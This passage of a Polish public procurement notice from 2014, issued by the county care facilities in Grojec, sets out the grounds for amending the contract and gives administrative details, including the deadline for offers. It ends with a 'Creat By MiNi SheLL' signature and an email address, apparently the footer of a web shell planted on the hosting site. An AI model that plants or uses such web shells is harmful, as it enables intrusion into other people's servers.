  a)działanie siły wyższej tj. wyjątkowego zdarzenia lub okoliczności, 
  b)wystąpienia zdarzeń mających wpływ na realizację przedmiotu umowy zależnych od  Zamawiającego,
  c)wystąpienie robót dodatkowych niezbędnych do prawidłowego wykonania realizowanego  zamówienia podstawowego, których wykonanie stało się konieczne na skutek sytuacji 
  niemożliwej wcześniej do przewidzenia,
  d)nadzwyczajne zdarzenia gospodarcze niezależne od Zamawiającego, których    
  Zamawiający nie mógł przewidzieć w chwili zawarcia umowy,
  e)decyzję nadzoru budowlanego mającą wpływ na przesuniecie terminu realizacji  robót.
2)zmianę technologii wykonania robót lub zmianę materiałów jeżeli nowe rozwiązania 
   będą korzystne dla zamawiającego przy zachowaniu niepogorszonych standardów   
   jakościowych.
3)rezygnację z części robót-ograniczenie zakresu robót wynikłe w trakcie realizacji robót  i konieczne w celu prawidłowej realizacji przedmiotu umowy wraz ze zmniejszeniem   wynagrodzenia. 
4)zmianę osób zdolnych do wykonania zamówienia przedstawionych w ofercie gdzie 
   Wykonawca proponuje zmianę osób w przypadkach:
   a)choroby lub innych zdarzeń losowych,
   b)jeżeli zmiana stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy np. rezygnacji.
5)Zamawiający może żądać od Wykonawcy zmiany osób zdolnych do wykonania    zamówienia wymienionych w ofercie jeżeli uzna, że nie wykonują one swoich    obowiązków wynikających z umowy. W przypadku przedmiotowej zmiany, nowe    osoby muszą spełniać wymagania określone dla danego specjalisty w Specyfikacji Istotnych Warunków Zamówienia.
6)zmiany osób sprawujących nadzór nad realizacją umowy wymienionych w  umowie.
7)zmiany stawki podatku VAT .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzol.cba.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Zakłady Opiekuńczo-Lecznicze w Grojcu.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2014 godzina 10:00, miejsce: dział finansowy pokój nr 3 Powiatowych Zakładów Opiekuńczo-Leczniczych w Grojcu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com